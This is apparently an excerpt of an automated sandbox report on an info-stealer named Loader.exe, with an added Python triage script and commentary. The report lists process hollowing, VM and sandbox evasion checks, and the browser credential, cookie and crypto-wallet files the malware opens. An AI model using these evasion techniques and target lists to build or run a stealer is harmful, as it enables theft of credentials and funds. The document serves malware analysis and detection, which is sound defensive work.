Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DEB75A push edx; retf 2_3_00DEB769
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DEB57C push cs; retf 2_3_00DEB589
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DEB778 push eax; retf 2_3_00DEB779
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DEB51D push ds; retf 2_3_00DEB509
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DEB73F push esp; retf 2_3_00DEB759
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DEB53D push ss; retf 2_3_00DEB549
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DE9737 push ebx; iretd 2_3_00DE9761
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DDAAF9 push ss; ret 2_3_00DDAB2B
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DD9EF4 push esi; ret 2_3_00DD9EFB
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DDF8EE push es; ret 2_3_00DDF90C
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DDD8A8 push ds; ret 2_3_00DDD8D3
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DDA0AA pushad ; ret 2_3_00DDA0AB
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DDFAA0 pushad ; retf 2_3_00DDFAA9
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DDD992 push es; ret 2_3_00DDD993
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DDEB82 push bp; ret 2_3_00DDEB84
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DDF7AC push 1800DEC9h; retf 2_3_00DDF79D
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DDD758 push ebx; ret 2_3_00DDD73B
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DDF74F push 1800DEC9h; retf 2_3_00DDF79D
Source: Loader.exe | Static PE information: section name: .text entropy: 7.102077354688428
Source: C:\Users\user\Desktop\Loader.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Loader.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Loader.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\Loader.exe | Code function: 2_3_00DDD2ED sldt word ptr [eax] 2_3_00DDD2ED
Source: C:\Users\user\Desktop\Loader.exe | Window / User API: threadDelayed 4353
Source: C:\Users\user\Desktop\Loader.exe TID: 7836 | Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\Desktop\Loader.exe TID: 3188 | Thread sleep count: 4353 > 30
Source: C:\Users\user\Desktop\Loader.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\Loader.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0009DAAE FindFirstFileExW, 0_2_0009DAAE
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0009DB5F FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_0009DB5F
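Two parts of this section are worth triaging before anything else: the push/ret listings, which all sit in process 2, dump 3, in the 0x00DD.... to 0x00DE.... range that does not exist in the original image (consistent with the "Injects a PE file into a foreign processes" signature, since the child Loader.exe is the one carrying the unpacked code), and the evasion evidence (Win32_VideoController and Win32_BIOS WMI queries, FirmwareTableInformation, SLDT, a 4353-iteration sleep loop that trips the sandbox's own threshold of 30). The following is an added example, not part of the Joe Sandbox report or of any LummaC tooling: it parses a subset of the evidence lines copied from above, buckets the "Code function" addresses by process, dump and memory region, counts the push/ret style functions per dump, and tags the evasion lines with MITRE ATT&CK sub-techniques. The ATT&CK mapping and the 1 MiB region granularity are my own assumptions for illustration.

```python
"""Triage the "Code function" and sandbox-evasion evidence lines of a Joe Sandbox report.

Added example, not part of the report. The sample lines are copied from the
report; the MITRE ATT&CK mapping and the 1 MiB region granularity are my own
assumptions for illustration.
"""
import re
from collections import Counter

# Detail column of a constructed subset of the evidence lines above.
EVIDENCE = """\
Code function: 0_2_00061410
Code function: 0_2_00042D00
Code function: 0_2_0008BD9A push ecx; ret 0_2_0008BDAD
Code function: 2_3_00D6F51C
Code function: 2_3_00DEB6DA pushad ; retf 2_3_00DEB6F9
Code function: 2_3_00DEB4ED push ds; retf 2_3_00DEB509
Code function: 2_3_00DE9737 push ebx; iretd 2_3_00DE9761
Code function: 2_3_00DDF7AC push 1800DEC9h; retf 2_3_00DDF79D
WMI Queries: IWbemServices::ExecQuery - ROOT\\CIMV2 : SELECT * FROM Win32_VideoController
System information queried: FirmwareTableInformation
Code function: 2_3_00DDD2ED sldt word ptr [eax]2_3_00DDD2ED
Window / User API: threadDelayed 4353
TID: 7836 Thread sleep time: -210000s >= -30000s
TID: 3188 Thread sleep count: 4353 > 30
WMI Queries: IWbemServices::ExecQuery - ROOT\\CIMV2 : SELECT * FROM Win32_BIOS
Code function: 0_2_0009DB5F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0009DB5F
"""

# <pid>_<dump>_<address>, optionally followed by disassembly and a trailing function reference.
CODE_FUNC_RE = re.compile(
    r"Code function: (?P<pid>\d+)_(?P<dump>\d+)_(?P<addr>[0-9A-F]{8})"
    r"(?:\s+(?P<asm>.*?))?\s*(?:\d+_\d+_[0-9A-F]{8})?$"
)
# push <x> ... ret / retf / iretd: a hand-rolled control transfer, not compiler output.
PUSH_RET_RE = re.compile(r"\bpush\w*\b.*\b(?:ret|retf|iretd)\b")

# Assumed mapping of evidence keywords to ATT&CK (sub-)techniques.
EVASION_RULES = (
    (re.compile(r"Win32_VideoController|Win32_BIOS|FirmwareTableInformation|\bsldt\b"),
     "T1497.001", "Virtualization/Sandbox Evasion: System Checks"),
    (re.compile(r"threadDelayed|Thread sleep"),
     "T1497.003", "Virtualization/Sandbox Evasion: Time Based Evasion"),
    (re.compile(r"FindFirstFileExW"),
     "T1083", "File and Directory Discovery"),
)


def parse_code_functions(text):
    """One record per "Code function" line: process id, dump id, address, disassembly."""
    funcs = []
    for line in text.splitlines():
        m = CODE_FUNC_RE.match(line)
        if m:
            funcs.append({"pid": int(m["pid"]), "dump": int(m["dump"]),
                          "addr": int(m["addr"], 16), "asm": m["asm"] or ""})
    return funcs


def bucket_by_region(funcs, granularity=0x100000):
    """Count functions per (pid, dump, region base). With 1 MiB regions the original
    image (process 0, 0x2xxxx-0xAxxxx) and the unpacked code that only exists in the
    child process (process 2, dump 3, 0xDxxxxx) land in different buckets."""
    buckets = Counter()
    for f in funcs:
        buckets[(f["pid"], f["dump"], f["addr"] & ~(granularity - 1))] += 1
    return buckets


def push_ret_gadgets(funcs):
    """push/ret style functions per (pid, dump); a cluster of them marks an unpacker
    or an obfuscated stage rather than ordinary compiled code."""
    return Counter((f["pid"], f["dump"]) for f in funcs if PUSH_RET_RE.search(f["asm"]))


def tag_evasion(text):
    """Tag each evidence line with the first matching ATT&CK rule."""
    tags = []
    for line in text.splitlines():
        for rx, tid, name in EVASION_RULES:
            if rx.search(line):
                tags.append((tid, name, line))
                break
    return tags


def sleep_loop(text):
    """Sleep-loop figures: iterations the sandbox observed and the threshold it applies."""
    delayed = re.search(r"threadDelayed (\d+)", text)
    count = re.search(r"Thread sleep count: (\d+) > (\d+)", text)
    return {
        "thread_delayed": int(delayed.group(1)) if delayed else None,
        "sleep_count": int(count.group(1)) if count else None,
        "threshold": int(count.group(2)) if count else None,
    }


def summarize(text):
    """One triage record for the whole evidence block."""
    funcs = parse_code_functions(text)
    return {
        "functions": len(funcs),
        "regions": bucket_by_region(funcs),
        "push_ret": push_ret_gadgets(funcs),
        "techniques": Counter(tid for tid, _, _ in tag_evasion(text)),
        "sleep": sleep_loop(text),
    }


if __name__ == "__main__":
    for key, value in summarize(EVIDENCE).items():
        print(f"{key}: {value}")
```

On the subset above every push/ret function but one lives in process 2, dump 3, in the 0xD00000 region, which is where the unpacked stage should be dumped from for static analysis; the single one in process 0 (0_2_0008BD9A) sits next to the CRT-style string function at 0008BBE0 and is most likely ordinary runtime code. The sleep figures (4353 iterations against a threshold of 30) are what the sandbox's sleep patching had to defeat to reach the stealer behaviour at all, so an emulator or a second sandbox run without sleep skipping is expected to time out before the WMI queries appear.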
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: Loader.exe, 00000002.00000003.1519076725.00000000034BA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Loader.exe, Loader.exe, 00000002.00000003.1687807478.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1644894647.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665753957.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1587677507.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1620380906.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2544370381.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2544255250.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1620222186.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665667377.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1435518173.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Loader.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0008BA66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0008BA66
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000B41B4 mov edi, dword ptr fs:[00000030h]0_2_000B41B4
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000994EC GetProcessHeap,0_2_000994EC
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0008BA5A SetUnhandledExceptionFilter,0_2_0008BA5A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0008BA66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0008BA66
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00093B9E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00093B9E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0008B6AA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0008B6AA

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_000B41B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_000B41B4
                Source: C:\Users\user\Desktop\Loader.exe | Memory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Loader.exe | Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exe | Code function: EnumSystemLocalesW,0_2_0009D069
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,0_2_000988DC
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0009D104
                Source: C:\Users\user\Desktop\Loader.exe | Code function: EnumSystemLocalesW,0_2_0009D357
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,0_2_0009D3B6
                Source: C:\Users\user\Desktop\Loader.exe | Code function: EnumSystemLocalesW,0_2_0009D48B
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,0_2_0009D4D6
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0009D57D
                Source: C:\Users\user\Desktop\Loader.exe | Code function: EnumSystemLocalesW,0_2_00098DD7
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0009CE18
                Source: C:\Users\user\Desktop\Loader.exe | Code function: GetLocaleInfoW,0_2_0009D683
                Source: C:\Users\user\Desktop\Loader.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_0008C4A7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0008C4A7
                Source: C:\Users\user\Desktop\Loader.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Loader.exe, 00000002.00000003.1644846564.0000000000E14000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1625967642.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1625798119.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Loader.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 7788, type: MEMORYSTR
                Source: Yara matchFile source: 2.2.Loader.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Loader.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2665491875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Loader.exeString found in binary or memory: Wallets/Electrum-LTC
                Source: Loader.exeString found in binary or memory: Wallets/ElectronCash
                Source: Loader.exeString found in binary or memory: Jaxx Liberty
                Source: Loader.exeString found in binary or memory: window-state.json
                Source: Loader.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: Loader.exeString found in binary or memory: ExodusWeb3
                Source: Loader.exeString found in binary or memory: %appdata%\Ethereum
                Source: Loader.exe, 00000002.00000003.1587677507.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Loader.exeString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
